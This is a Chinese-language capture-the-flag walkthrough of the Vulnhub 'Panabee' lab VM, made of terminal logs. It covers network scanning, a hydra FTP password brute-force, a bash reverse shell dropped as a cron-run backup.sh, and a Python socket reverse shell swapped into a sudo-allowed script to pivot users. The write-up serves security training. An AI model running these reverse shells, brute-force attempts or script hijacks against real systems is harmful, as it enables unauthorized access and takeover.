Panabee识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor 192.168.56.100 08:00:27:cd:98:c4 1 60 PCS Systemtechnik GmbH 192.168.56.228 08:00:27:2b:99:a3 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.228
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scanStarting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDTNmap scan report for bogon (192.168.56.228)Host is up (0.00011s latency).Not shown: 65529 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)| 256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)|_ 256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)25/tcp open smtp Postfix smtpd| ssl-cert: Subject: commonName=panabee| Subject Alternative Name: DNS:panabee| Not valid before: 2020-06-14T18:25:48|_Not valid after: 2030-06-12T18:25:48|_ssl-date: TLS randomness does not represent time|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING80/tcp open http Apache httpd 2.4.41 ((Ubuntu))|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works139/tcp open netbios-ssn Samba smbd 4.6.2445/tcp open netbios-ssn Samba smbd 4.6.2MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)Service Info: Host: panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: 7h59m58s|_nbstat: NetBIOS name: PANABEE, NetBIOS user: , NetBIOS MAC: (unknown)| smb2-time: | date: 2023-03-23T11:21:52|_ start_date: N/A| smb2-security-mode: | 3.1.1: |_ Message signing enabled but not requiredService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ smbclient //192.168.56.228/note Password for [WORKGROUP\kali]:Try "help" to get a list of possible commands.smb: \> ls . D 0 Sun Jun 14 23:08:42 2020 .. D 0 Mon Jun 15 04:59:44 2020 note.txt N 265 Sun Jun 14 23:08:42 2020 20508240 blocks of size 1024. 12823536 blocks availablesmb: \> get note.txt getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)smb: \> put test.txt putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)smb: \> ls -alhNT_STATUS_NO_SUCH_FILE listing \-alhsmb: \> ls . D 0 Thu Mar 23 07:23:20 2023 .. D 0 Mon Jun 15 04:59:44 2020 test.txt A 12 Thu Mar 23 07:23:20 2023 note.txt N 265 Sun Jun 14 23:08:42 2020 20508240 blocks of size 1024. 12823528 blocks available
可以通过SMB上传文件
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat note.txt Dear goper, I'll just leave it here as a note,Sorry for the late response,The server will now `backup` you files in your home dir,go ahead and backup anything you like, server will do it for you.Please delete this note once you've read for security measure
goper是用户名?
有计划任务在执行?(定期备份文件)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ nikto -h http://192.168.56.228- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.228+ Target Hostname: 192.168.56.228+ Target Port: 80+ Start Time: 2023-03-22 23:25:23 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.41 (Ubuntu)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS + 7915 requests: 0 error(s) and 5 item(s) reported on remote host+ End Time: 2023-03-22 23:25:52 (GMT-4) (29 seconds)---------------------------------------------------------------------------+ 1 host(s) tested ********************************************************************* Portions of the server's headers (Apache/2.4.41) are not in the Nikto 2.1.6 database or are newer than the known string. Would you like to submit this information (*no server specific data*) to CIRT.net for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
目录扫描没有什么收获,接下来用hydra来破解密码
──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228 Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task[DATA] attacking ftp://192.168.56.228:21/[21][ftp] host: 192.168.56.228 login: goper password: spiderman1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ftp 192.168.56.228 Connected to 192.168.56.228.220 (vsFTPd 3.0.3)Name (192.168.56.228:kali): goper331 Please specify the password.Password: 230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh229 Entering Extended Passive Mode (|||8003|)150 Here comes the directory listing.drwxrwxr-x 4 1000 118 4096 Jun 21 2020 .drwxrwxr-x 4 1000 118 4096 Jun 21 2020 ..-rw------- 1 1000 1000 4591 Jun 21 2020 .bash_history-rw-r--r-- 1 1000 1000 220 Feb 25 2020 .bash_logout-rw-r--r-- 1 1000 1000 3771 Feb 25 2020 .bashrcdrwx------ 2 1000 1000 4096 Jun 14 2020 .cachedrwxrwxr-x 3 1000 1000 4096 Jun 15 2020 .local-rw-r--r-- 1 1000 1000 807 Feb 25 2020 .profile-rw-rw-r-- 1 1000 1000 66 Jun 15 2020 .selected_editor-rw-r--r-- 1 1000 1000 0 Jun 14 2020 .sudo_as_admin_successful-rw------- 1 1000 1000 11134 Jun 15 2020 .viminfo-rw-r--r-- 1 0 1000 332 Jun 15 2020 status.py226 Directory send OK.ftp> pwdRemote directory: /ftp> get status.pylocal: status.py remote: status.py229 Entering Extended Passive Mode (|||59411|)150 Opening BINARY mode data connection for status.py (332 bytes).100% |*********************************************************************************| 332 2.25 KiB/s 00:00 ETA226 Transfer complete.332 bytes received in 00:00 (2.23 KiB/s)ftp> put test.txt local: test.txt remote: test.txt229 Entering Extended Passive Mode (|||13323|)150 Ok to send data.100% |*********************************************************************************| 12 221.10 KiB/s 00:00 ETA226 Transfer complete.12 bytes sent in 00:00 (8.87 KiB/s)ftp>
似乎在goper的家目录,因此可以将ssh公钥上传到目标主机
──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ssh-keygen Generating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): goperEnter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in goperYour public key has been saved in goper.pubThe key fingerprint is:SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kaliThe key's randomart image is:+---[RSA 3072]----+| . =Xo. || .o += + || .o +oo++ o || o+.+o+oE.=oo ||.oo+ooo.S o.==. ||....+ . =.oo || . . +. || .. || .. |+----[SHA256]-----+ ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ls goper goper.pub nmap_full_scan note.txt status.py test.txt
ftp> mkdir .ssh257 "/.ssh" createdftp> cd .ssh250 Directory successfully changed.ftp> put authorized_keys local: authorized_keys remote: authorized_keys229 Entering Extended Passive Mode (|||34675|)150 Ok to send data.100% |*********************************************************************************| 563 16.77 MiB/s 00:00 ETA226 Transfer complete.563 bytes sent in 00:00 (0.98 MiB/s)ftp>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ ssh -i goper goper@192.168.56.228 The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.goper@192.168.56.228: Permission denied (publickey).
但是目标并不允许基于私钥登录,这条路行不通
写一个bash脚本上传到ftp也就是goper的家目录,看能不能被自动执行
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat shell.sh bash -i >& /dev/tcp/192.168.56.146/5555 0>&1
这个bash脚本名称应该是backup.sh,才回cron执行
ftp> put backup.sh local: backup.sh remote: backup.sh229 Entering Extended Passive Mode (|||10215|)150 Ok to send data.100% |*********************************************************************************| 57 869.75 KiB/s 00:00 ETA226 Transfer complete.57 bytes sent in 00:00 (45.43 KiB/s)
─$ sudo nc -nlvp 5555listening on [any] 5555 ...connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726bash: cannot set terminal process group (3520): Inappropriate ioctl for devicebash: no job control in this shellgoper@panabee:~$ pwdpwd/home/gopergoper@panabee:~$ ls -alhls -alhtotal 72Kdrwxrwxr-x 5 goper ftp 4.0K Mar 23 11:57 .drwxr-xr-x 4 root root 4.0K Jun 15 2020 ..-rwx--x--x 1 goper goper 57 Mar 23 11:57 backup.sh-rw------- 1 goper goper 4.5K Jun 21 2020 .bash_history-rw-r--r-- 1 goper goper 220 Feb 25 2020 .bash_logout-rw-r--r-- 1 goper goper 3.7K Feb 25 2020 .bashrcdrwx------ 2 goper goper 4.0K Jun 14 2020 .cachedrwxrwxr-x 3 goper goper 4.0K Jun 15 2020 .local-rw-r--r-- 1 goper goper 807 Feb 25 2020 .profile-rw-rw-r-- 1 goper goper 66 Jun 15 2020 .selected_editor-rw------- 1 goper goper 57 Mar 23 11:54 shell.shdrwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh-rw-r--r-- 1 root goper 332 Jun 15 2020 status.py-rw-r--r-- 1 goper goper 0 Jun 14 2020 .sudo_as_admin_successful-rw------- 1 goper goper 12 Mar 23 11:40 test.txt-rw------- 1 goper goper 11K Jun 15 2020 .viminfogoper@panabee:~$ sudo -lsudo -lMatching Defaults entries for goper on panabee: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser goper may run the following commands on panabee: (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py
可以将原有的status.py删除,然后通过FTP上传反弹shell的python脚本,从而得到jenny的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ vim status.py ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat status.pypython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
goper@panabee:~$ rm -rf status.pyrm -rf status.py
ftp> put status.pylocal: status.py remote: status.py229 Entering Extended Passive Mode (|||26655|)150 Ok to send data.100% |*********************************************************************************| 232 3.35 MiB/s 00:00 ETA226 Transfer complete.232 bytes sent in 00:00 (167.32 KiB/s)ftp>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ cat status.pyimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.pysudo -u jenny /usr/bin/python3 /home/goper/status.py/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission deniedgoper@panabee:~$ chmod 777 status.pychmod 777 status.pygoper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.pysudo -u jenny /usr/bin/python3 /home/goper/status.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$ sudo nc -nlvp 8888listening on [any] 8888 ...connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108$ iduid=1001(jenny) gid=1001(jenny) groups=1001(jenny)$ which python3/usr/bin/python3$ python3 -c 'import pty;pty.spawn("/bin/bash")'jenny@panabee:/home/goper$ cd /homecd /homejenny@panabee:/home$ ls -alhls -alhtotal 16Kdrwxr-xr-x 4 root root 4.0K Jun 15 2020 .drwxr-xr-x 20 root root 4.0K Jun 15 2020 ..drwxrwxr-x 5 goper ftp 4.0K Mar 23 12:08 goperdrwx------ 3 jenny jenny 4.0K Jun 15 2020 jennyjenny@panabee:/home$ cd jennycd jennyjenny@panabee:~$ ls -alhls -alhtotal 40Kdrwx------ 3 jenny jenny 4.0K Jun 15 2020 .drwxr-xr-x 4 root root 4.0K Jun 15 2020 ..-rw------- 1 jenny jenny 2.0K Jun 30 2020 .bash_history-rw-r--r-- 1 jenny jenny 220 Feb 25 2020 .bash_logout-rw-r--r-- 1 jenny jenny 3.7K Feb 25 2020 .bashrc-rw------- 1 jenny jenny 32 Jun 15 2020 .lesshst-rw-r--r-- 1 jenny jenny 807 Feb 25 2020 .profile-rw-rw-r-- 1 jenny jenny 13 Jun 15 2020 status.txt-rw-r--r-- 1 root root 213 Jun 15 2020 thanks_jennydrwxrwxr-x 2 root jenny 4.0K Jun 30 2020 .tmux-0
从.bash_history知道有个secret.zip文件,将其下载到Kali Linux本地
但是破解失败,本靶机的提权需要利用.tmux进行
提权
cd /root# ls -alhls -alhtotal 80Kdrwx------ 5 root root 4.0K Jun 30 2020 .drwxr-xr-x 20 root root 4.0K Jun 15 2020 ..-rw------- 1 root root 18K Jun 30 2020 .bash_history-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrcdrwx------ 2 root root 4.0K Jun 14 2020 .cache-rw------- 1 root root 38 Jun 30 2020 .lesshstdrwxr-xr-x 3 root root 4.0K Jun 14 2020 .local-rw-r--r-- 1 root root 161 Dec 5 2019 .profile-rw-r--r-- 1 root root 239 Jun 15 2020 proof.txt-rw-r--r-- 1 root root 66 Jun 15 2020 .selected_editordrwx------ 2 root root 4.0K Jun 14 2020 .ssh-rw------- 1 root root 13K Jun 21 2020 .viminfo __ __ ___ ___ |__) /\ |\ | /\ |__) |__ |__ | /~~\ | \| /~~\ |__) |___ |___
STRIVE FOR PROGRESS,NOT FOR PERFECTION